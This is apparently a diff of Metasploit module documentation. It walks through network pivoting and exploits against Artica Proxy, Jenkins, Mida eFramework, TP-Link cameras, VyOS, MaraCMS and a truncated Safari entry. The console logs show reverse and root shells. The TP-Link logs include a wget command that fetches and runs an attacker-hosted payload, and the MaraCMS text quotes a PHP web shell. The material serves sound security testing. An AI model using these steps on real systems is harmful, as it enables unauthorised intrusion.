+msf6 auxiliary(scanner/smb/smb_enum_gpp) >
+```
@@ -0,0 +1,88 @@
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/server/socks_proxy`
+3. Do: `run`
+4. Do: `curl --proxy socks5://localhost:1080 https://github.com`
+5. You should see the source for the GitHub homepage
+
+## Options
+
+**SRVHOST**
+
+The local IP address to bind the proxy server to. The default value of `0.0.0.0` will expose the proxy to everything on
+the attacker's network.
+
+**SRVPORT**
+
+The local port to bind the proxy to. The default value is `1080`, the standard port for a SOCKS proxy.
+
+## Scenarios
+
+This module is great when pivoting across a network. Suppose we have two machines:
+
+1. Attacker's machine, on the `192.168.1.0/24` subnet.
+2. Victim machine with two network interfaces, one attached to the `192.168.1.0/24` subnet and the other attached to the
+   non-routable `10.0.0.0/24` subnet.
+
+We'll begin by starting the SOCKS proxy:
+
+```
+msf6 auxiliary(server/socks_proxy) > show options
+
+Module options (auxiliary/server/socks_proxy):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   no        Proxy password for SOCKS5 listener
+   SRVHOST   0.0.0.0          yes       The address to listen on
+   SRVPORT   1080             yes       The port to listen on
+   USERNAME                   no        Proxy username for SOCKS5 listener
+   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)
+
+
+Auxiliary action:
+
+   Name   Description
+   ----   -----------
+   Proxy  Run a SOCKS proxy server
+
+
+msf6 auxiliary(server/socks_proxy) > run
+[*] Auxiliary module execution completed
+[*] Starting the SOCKS proxy server
+msf6 auxiliary(socks_proxy) >
+```
+
+Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From
+there, we can use the `autoroute` script to enable access to the non-routable subnet:
+
+```
+meterpreter > run autoroute -s 10.0.0.0/24
+```
+
+The `autoroute` module will enable our local SOCKS proxy to direct all traffic to the `10.0.0.0/24` subnet through our
+Meterpreter session, causing it to emerge from the victim's machine and thus giving us access to the non-routable
+subnet. We can now use `curl` to connect to a machine on the non-routable subnet via the SOCKS proxy:
+
+```
+curl --proxy socks5://localhost:1080 http://10.0.0.15:8080/robots.txt
+```
+
+We can take this a step further and use proxychains to enable other tools that don't have built-in support for proxies
+to access the non-routable subnet. The short-and-sweet guide to installing and configuring proxychains looks something
+like this:
+
+```
+# apt-get install proxychains
+# cp /etc/proxychains.conf /etc/proxychains.conf.backup
+# echo "socks5 127.0.0.1 8080" > /etc/proxychains.conf
+```
+
+From there, we can use our other tools by simply prefixing them with `proxychains`:
+
+```
+# proxychains curl http://10.0.0.15:8080/robots.txt
+# proxychains nmap -sT -Pn -n -p 22 10.0.0.15
+# proxychains firefox
+```
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits two vulnerabilities on Artica Proxy (version 4.30.000000 and lower),
+an authentication bypass and an authenticated remote code execution, the authentication bypass
+is due to an SQL injection vulnerability present in fw.login.php.
+
+Because the application runs in virtual appliance, successful exploitation yields code execution
+as root on the target system.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection`
+3. Do: `set RHOSTS [RHOSTS]`
+4. Do: `check`
+5. Verify if `check` detects vulnerable hosts as it should
+6. Do: `exploit`
+7. Verify if the payload was successfully executed on the target (that you get a session)
+
+## Options
+
+### PHPSESSID
+
+The session cookie, if you have one.
+If not set, the module will attempt to bypass authentication using the authentication bypass vulnerability.
+
+## Scenarios
+
+### Artica Proxy 4.26, 4.30.000000
+
+#### Using a dropper / getting a native meterpreter shell (TARGET being Linux Dropper)
+
+```
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
+[+] Session cookie : 9a171f6964f8b35f53abf652d2b28748
+[*] Using URL: http://0.0.0.0:8080/f0Y1VFKK4nAW
+[*] Local IP: http://192.168.1.222:8080/f0Y1VFKK4nAW
+[*] Attempting to gain RCE via CVE-2020-17505
+[*] Client 192.168.1.223 (Wget/1.20.1 (linux-gnu)) requested /f0Y1VFKK4nAW
+[*] Sending payload to 192.168.1.223 (Wget/1.20.1 (linux-gnu))
+[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:48330) at 2020-08-30 16:45:58 +0200
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : www.red0xff.co
+OS           : Debian 10.2 (Linux 4.19.0-6-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 2724 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+#### Cmd payload : `cmd/unix/reverse_perl`
+
+```
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > 
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
+[+] Session cookie : 1049da6bfa8e6217072f810a9b62ff7b
+[*] Attempting to gain RCE via CVE-2020-17505
+[*] Command shell session 7 opened (192.168.1.222:4444 -> 192.168.1.223:48466) at 2020-08-30 16:50:15 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+whoami
+root
+```
@@ -0,0 +1,90 @@
+## Vulnerable Application
+
+  An unauthenticated Java object deserialization vulnerability exists
+  in the CLI component for Jenkins versions below `v2.54`.
+
+  The `readFrom` method within the `Command` class in the Jenkins
+  CLI remoting component deserializes objects received from clients without
+  first checking / sanitizing the data. Because of this, a malicious serialized
+  object contained within a serialized `SignedObject` can be sent to the Jenkins
+  endpoint to achieve code execution on the target.
+
+### Installation
+
+  Vulnerable versions of Jenkins can be downloaded from [here](https://get.jenkins.io/war-stable/).
+  Additionally, a [jdk](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html) will need to be installed on the target system.
+
+  To start Jenkins, navigate to the location of the downloaded `war` file and execute:
+  `java -jar <jenkins-file>.war`. To test if Jenkins is properly working, the CLI component
+  can be accessed by navigating to `http://localhost:8080/cli`.
+
+### How to Produce Binary Blob from PoC
+
+  Generating the serialized object first requires the `Payload.java` file
+  located in the `data/exploits/CVE-2017-1000353/` folder.
+
+  1. Obtain a vulnerable version of Jenkins
+     `wget https://get.jenkins.io/war-stable/<version>/jenkins.war`
+  2. Create a folder to extract the Jenkins files into
+     `mkdir libs/`
+  3. Extract the contents of the war file into the newly created folder
+     `cd libs/ && jar -xf ../jenkins.war`
+  4. Assuming the `Payload.java` file is located in the same location as `jenkins.war`,
+     compile the file, ensuring the Jenkins libraries are in the classpath
+     `cd ../ && javac -cp ".:./libs/WEB-INF/lib/*" Payload.java`
+  5. To execute, supply the name of the outfile for the serialized object
+     and a placeholder command (Note. the command gets patched in the exploit module)
+     `java -cp ".:./libs/WEB-INF/lib/*" Payload serial_obj.ser 'touch /tmp/test'`
+  6. The serialized object will be located in the outfile you supplied in the
+     previous step
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/jenkins_cli_deserialization`
+  4. Do: `set RHOST <ip>`
+  5. Do: `run`
+  6. You should get a shell.
+
+## Options
+
+  No options
+
+## Scenarios
+### Jenkins `v2.32.1` on Ubuntu Linux 18.04.1`
+
+```
+msf6 > use exploit/linux/http/jenkins_cli_deserialization
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/jenkins_cli_deserialization) > set rhost 192.168.37.149
+rhost => 192.168.37.149
+msf6 exploit(linux/http/jenkins_cli_deserialization) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf6 exploit(linux/http/jenkins_cli_deserialization) > run
+
+[*] Started reverse TCP handler on 192.168.37.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Jenkins version 2.32.1 detected
+[*] Sending payload...
+[*] Using URL: http://0.0.0.0:8080/JMpXWoK
+[*] Local IP: http://192.168.1.141:8080/JMpXWoK
+[*] Client 192.168.37.149 (curl/7.58.0) requested /JMpXWoK
+[*] Sending payload to 192.168.37.149 (curl/7.58.0)
+[*] Command Stager progress -  50.46% done (55/109 bytes)
+[*] Command Stager progress -  70.64% done (77/109 bytes)
+[*] Command Stager progress -  82.57% done (90/109 bytes)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Sending stage (976712 bytes) to 192.168.37.149
+[*] Meterpreter session 7 opened (192.168.37.1:4444 -> 192.168.37.149:44748) at 2020-09-10 18:01:34 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: space @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > sysinfo
+Computer     : 192.168.37.149
+OS           : Ubuntu 18.04 (Linux 5.4.0-42-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in
+[Mida Solutions eFramework](https://www.midasolutions.com/)
+version 2.9.0 and prior.
+
+The `ajaxreq.php` file allows unauthenticated users to inject
+arbitrary commands in the `PARAM` parameter to be executed as
+the apache user. The sudo configuration permits the apache user
+to execute any command as root without providing a password,
+resulting in privileged command execution as root.
+
+This module has been successfully tested on Mida Solutions
+eFramework-C7-2.9.0 virtual appliance.
+
+Download:
+
+http://ova-efw.midasolutions.com/
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set payload [payload]`
+1. Do: `set LHOST [IP]`
+1. Do: `exploit`
+
+## Options
+
+### TARGETURI
+
+Base path to eFramework (Default: `/`)
+
+## Scenarios
+
+```
+msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
+rhosts => 172.16.191.123
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
+[+] 172.16.191.123:443 - The target is vulnerable.
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending stage (3008420 bytes) to 172.16.191.123
+[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+
+meterpreter > getuid
+Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.16.191.123
+OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -121,6 +121,8 @@ Exploit target:

 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set password admin
+password => admin
 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3
 lhost => 192.168.1.3
 msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
@@ -0,0 +1,147 @@
+## Vulnerable Application
+
+TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,
+NC250, NC260, NC450) are vulnerable to an authenticated command
+injection. In all devices except NC210, despite a check on the name
+length in `swSystemSetProductAliasCheck`, no other checks are in place
+in order to prevent shell metacharacters from being introduced. The
+system name would then be used in `swBonjourStartHTTP` as part of a
+shell command where arbitrary commands could be injected and
+executed as root. NC210 devices cannot be exploited directly via
+`/setsysname.cgi` due to proper input validation. NC210 devices are
+still vulnerable since `swBonjourStartHTTP` did not perform any
+validation when reading the alias name from the configuration file.
+The configuration file can be written, and code execution can be
+achieved by combining this issue with CVE-2020-12110.
+This module will therefore support the following TP-Link cameras:
+
+-NC200 <= 2.1.9 build 200225
+
+-NC220 <= 1.3.0 build 200304
+
+-NC230 <= 1.3.0 build 200304
+
+-NC250 <= 1.3.0 build 200304
+
+-NC260 <= 1.5.2 build 200304
+
+-NC450 <= 1.5.3 build 200304
+
+## Verification Steps
+
+-Turn your camera on and make sure you can connect to its web interface.
+
+-Take note of the camera model, ip address, web interface port and credentials.
+
+-Once that is done, open msfconsole and execute the following commands:
+
+1. `use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection`
+2. `set rhost [camera ip]`
+3. `set rport [camera web interface port, e.g. 80 or 443]`
+4. `set target [ 0 for NC200, NC220, NC230, NC250 | 1 for NC260, NC450]`
+5. `set username [web interface username]`
+6. `set password [corresponding password]`
+7. `set payload [payload of choice, e.g. linux/mipsle/shell/reverse_tcp]`
+8. `set lhost [host ip where our reverse shell is listening]`
+9. `set lport [port to listen for incoming shell]`
+10. `exploit`
+
+You should get a shell.
+
+## Options
+### USERNAME
+
+The web interface username
+
+### PASSWORD
+
+The web interface password for the specified username
+
+## Scenarios
+
+Target = 0 (TP-Link NC200, NC220, NC230, NC250)
+
+```
+msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
+[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
+rhost => 192.168.0.1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80
+rport => 80
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
+username => admin
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
+password => password
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
+payload => linux/mipsle/shell/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
+lhost => 192.168.0.254
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
+lport => 5555
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.254:6666 
+[*] Authenticating with admin:YWRtaW4= ...
+[+] Logged-in as admin
+[+] Got cookie: t46af69kmher6f9
+[+] Got token: g3cgt74qi0li8rd
+[*] Using URL: http://0.0.0.0:8080/UzN4UMl7PF9
+[*] Local IP: http://10.0.2.15:8080/UzN4UMl7PF9
+[*] Executing command: wget -qO /tmp/jxVywWSo http://192.168.0.254:8080/UzN4UMl7PF9;chmod +x /tmp/jxVywWSo;/tmp/jxVywWSo;rm -f /tmp/jxVywWSo
+[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command shell session 3 opened (192.168.0.254:6666 -> 192.168.0.1:60141) at 2020-09-16 18:58:02 -0400
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+```
+
+Target = 1 (TP-Link NC260, NC450)
+
+```
+msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
+[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
+rhost => 192.168.0.1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443
+rport => 443
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1
+target => 1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
+username => admin
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
+password => password
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
+payload => linux/mipsle/shell/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
+lhost => 192.168.0.254
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
+lport => 5555
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.254:5555 
+[*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ...
+[+] Logged-in as admin
+[+] Got cookie: s8ee6m830juadua
+[+] Got token: kad9grok1ap37li
+[*] Using URL: http://0.0.0.0:8080/Le4r7p9x
+[*] Local IP: http://10.0.2.15:8080/Le4r7p9x
+[*] Executing command: wget -qO /tmp/MzczOZUl http://192.168.0.254:8080/Le4r7p9x;chmod +x /tmp/MzczOZUl;/tmp/MzczOZUl;rm -f /tmp/MzczOZUl
+[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
+[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Server stopped.
+```
+
+### References
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109
+
+https://nvd.nist.gov/vuln/detail/CVE-2020-12109
+
+https://seclists.org/fulldisclosure/2020/May/2
@@ -0,0 +1,143 @@
+## Vulnerable Application
+
+This module exploits command injection vulnerabilities and an insecure
+default sudo configuration on [VyOS](https://www.vyos.io/products/)
+versions 1.0.0 <= 1.1.8 to execute arbitrary system commands as root.
+
+VyOS features a `restricted-shell` system shell intended for use by
+low privilege users with operator privileges. This module exploits
+a vulnerability in the `telnet` command to break out of the restricted
+shell, then uses sudo to exploit a command injection vulnerability in
+`/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl` to execute commands
+with root privileges.
+
+This module has been tested successfully on VyOS 1.1.8 amd64 and
+VyOS 1.0.0 i386.
+
+## Verification Steps
+
+Download:
+
+* https://downloads.vyos.io/?dir=release/legacy/
+
+Login as `vyos` / `vyos`.
+
+Create a new user with `operator` privileges:
+
+```
+vyos@vyos:~$ configure
+[edit]
+vyos@vyos# set system login user jsmith full-name "John Smith"
+[edit]
+vyos@vyos# set system login user jsmith authentication plaintext-password password
+[edit]
+vyos@vyos# set system login user jsmith level operator
+[edit]
+vyos@vyos# commit
+s[edit]
+vyos@vyos# save
+Saving configuration to '/config/config.boot'...
+Done
+```
+
+Start the OpenSSH service:
+
+```
+vyos@vyos:~$ sudo sh
+sh-4.1# service ssh start
+```
+
+1. Start msfconsole
+1. Do: `use exploit/linux/ssh/vyos_restricted_shell_privesc`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set USERNAME [username]`
+1. Do: `set PASSWORD [password]`
+1. Do: `set payload [payload]`
+1. Do: `set LHOST [IP]`
+1. Do: `exploit`
+
+## Options
+
+### USERNAME
+
+SSH username (default: `vyos`)
+
+### PASSWORD
+
+SSH password (default: `vyos`)
+
+## Scenarios
+
+### VyOS 1.1.8 (amd64) - operator user
+
+```
+msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
+rhosts => 172.16.191.158
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith
+username => jsmith
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password
+password => password
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
+[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444
+[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
+[+] SSH connection established
+[*] Requesting PTY ...
+[+] PTY successfully obtained
+[*] Requesting shell ...
+[+] Remote shell successfully obtained
+[*] Remote system is VyOS
+[*] Remote session is using restricted-shell. Attempting breakout to system shell ...
+[+] Unrestricted system shell successfully obtained. Sending payload ...
+[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
+cat /etc/issue
+Welcome to VyOS - \n \l
+```
+
+### VyOS 1.1.8 (amd64) - admin user
+
+```
+msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
+rhosts => 172.16.191.158
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos
+username => vyos
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos
+password => vyos
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
+[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444
+[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
+[+] SSH connection established
+[*] Requesting PTY ...
+[+] PTY successfully obtained
+[*] Requesting shell ...
+[+] Remote shell successfully obtained
+[*] Remote system is VyOS
+[*] Remote session is using unrestricted shell. Launching system shell ...
+[+] Unrestricted system shell successfully obtained. Sending payload ...
+[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
+cat /etc/issue
+Welcome to VyOS - \n \l
+```
@@ -0,0 +1,143 @@
+## Vulnerable Application
+This module exploits an arbitrary file upload vulnerability in MaraCMS 7.5 and prior in order to execute arbitrary commands.
+
+The module first tries to obtain the MaraCMS version from `/about.php` (for MaraCMS 7.5, the version number mentioned is `7.2`.)
+The module then visits `/?login` to obtain the `shash` token, which is required for authentication. Next,
+the module sends an HTTP POST request to `codebase/handler.php` in order to obtain the salt used by MaraCMS to create password hashes.
+The module then uses the `shash` token and the salt to create the required authentication hashes,
+and sends these via a second HTTP POST request to the handler.
+
+If authentication is successful, the module tries to upload a malicious PHP file to the web root,
+again via an HTTP POST request to `codebase/handler.php.`
+If the `php` target is selected, the payload is embedded in the uploaded file
+and the module attempts to execute the payload via an HTTP GET request to this file.
+For the `linux` and `windows` targets, the module uploads a simple PHP web shell similar to `<?php system($_GET["cmd"]); ?>`.
+Subsequently, it leverages the CmdStager mixin to deliver the final payload via a series of HTTP GET requests
+in the form of `/<php_web_shell>?<cmd>=<payload>`.
+
+Valid credentials for a MaraCMS `admin` or `manager` account are required.
+This module has been successfully tested against MaraCMS 7.5 running on Windows Server 2012 (XAMPP server).
+
+Vulnerable software for testing can be downloaded [here](https://sourceforge.net/projects/maracms/).
+Installation is just a matter of unzipping the package to a php-capable webhost.
+The requirements specified on SourceForge are an Apache or equivalent webserver (LightTPD, Nginx, etc.)
+and a PHP version from 5.3 to 7.1.1. Both of these requirements can easily be fulfilled by downloading
+an older version of XAMPP server for Windows or Linux from [here](https://sourceforge.net/projects/xampp/).
+MaraCMS does not require a database, nor an installation script.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/maracms_upload_exec`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the MaraCMS account]`
+6. Do: `set PASSWORD [password for the MaraCMS account]`
+7. Do: `set target [target]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the MaraCMS account to authenticate with. The default value is `changeme`,
+as this is the default admin password for MaraCMS.
+### TARGETURI
+The base path to MaraCMS. The default value is `/`.
+### USERNAME
+The username for the MaraCMS account to authenticate with. The default value is `admin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   PHP
+1   Linux
+2   Windows
+```
+
+## Scenarios
+### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - PHP target
+```
+msf5 exploit(multi/http/maracms_upload_exec) > show options
+
+Module options (exploit/multi/http/maracms_upload_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   changeme         yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to MaraCMS
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  1192.168.1.12    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+msf5 exploit(multi/http/maracms_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.12 :4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
+[*] Obtained salt `9781` from server. Using salt to authenticate...
+[+] Successfully authenticated to MaraCMS
+[*] Uploading payload as zKEdBPw5j.php...
+[+] Successfully uploaded zKEdBPw5j.php
+[*] Executing the payload...
+[*] Sending stage (38288 bytes) to 192.168.1.20 
+[*] Meterpreter session 15 opened (192.168.1.12 :4444 -> 192.168.1.20 :49324) at 2020-09-22 15:30:14 -0400
+
+meterpreter > 
+[!] Deleting: zKEdBPw5j.php
+[+] zKEdBPw5j.php removed
+getuid
+Server username: Administrator (0)
+meterpreter >
+```
+### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - Windows target
+```
+msf5 exploit(multi/http/maracms_upload_exec) > run
+
+[*] Started reverse TCP handler on 1192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
+[*] Obtained salt `6521` from server. Using salt to authenticate...
+[+] Successfully authenticated to MaraCMS
+[*] Uploading payload as gCUII0Fx41Q.php...
+[+] Successfully uploaded gCUII0Fx41Q.php
+[*] Executing the payload via a series of HTTP GET requests to `/gCUII0Fx41Q.php?1xFqv=<command>`
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (201283 bytes) to 192.168.1.20
+[*] Meterpreter session 14 opened (1192.168.1.12:4444 -> 192.168.1.20:49323) at 2020-09-22 15:30:05 -0400
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+
+meterpreter > 
+[!] Deleting: gCUII0Fx41Q.php
+[+] gCUII0Fx41Q.php removed
+getuid
+Server username: WIN-S417DG9MRTR\Administrator
+meterpreter >
+```
@@ -46,7 +46,7 @@ is possible. There are 4 total types of human verification, an image (GD or Imag
 (which is stored as a regular expression), Recaptcha2 (an external api based captcha), and disabled.

 - If an `Image` (GD or ImageMagic based) human verification is selected, the module can bypass it and requires
-no interaction. This is done by querying the database for the image contents using the SQL injection vulnerabilty.
+no interaction. This is done by querying the database for the image contents using the SQL injection vulnerability.

 - If the `Question/Answer` human verification is selected, the module will attempt to submit the answer retrieved
 from the database utilizing the SQL injection vulnerability. This can sometimes fail and require manual intervention
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+This module exploits an incorrect side-effect modeling of the 'in' operator.
+The DFG compiler assumes that the 'in' operator is side-effect free, however
+the `<embed>` element with the PDF plugin provides a callback that can trigger
+side-effects leading to type confusion (CVE-2020-9850).
+
+The type confusion can be used as addrof and fakeobj primitives that then
+lead to arbitrary read/write of memory. These primitives allow us to write
+shellcode into a JIT region (RWX memory) containing the next stage of the
+exploit.
+
+The next stage uses CVE-2020-9856 to exploit a heap overflow in CVM Server,
+and extracts a macOS application containing our payload into /var/db/CVMS.
+The payload can then be opened with CVE-2020-9801, executing the payload
+as a user but without sandbox restrictions.
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. `use exploit/osx/browser/safari_in_operator_side_effect`
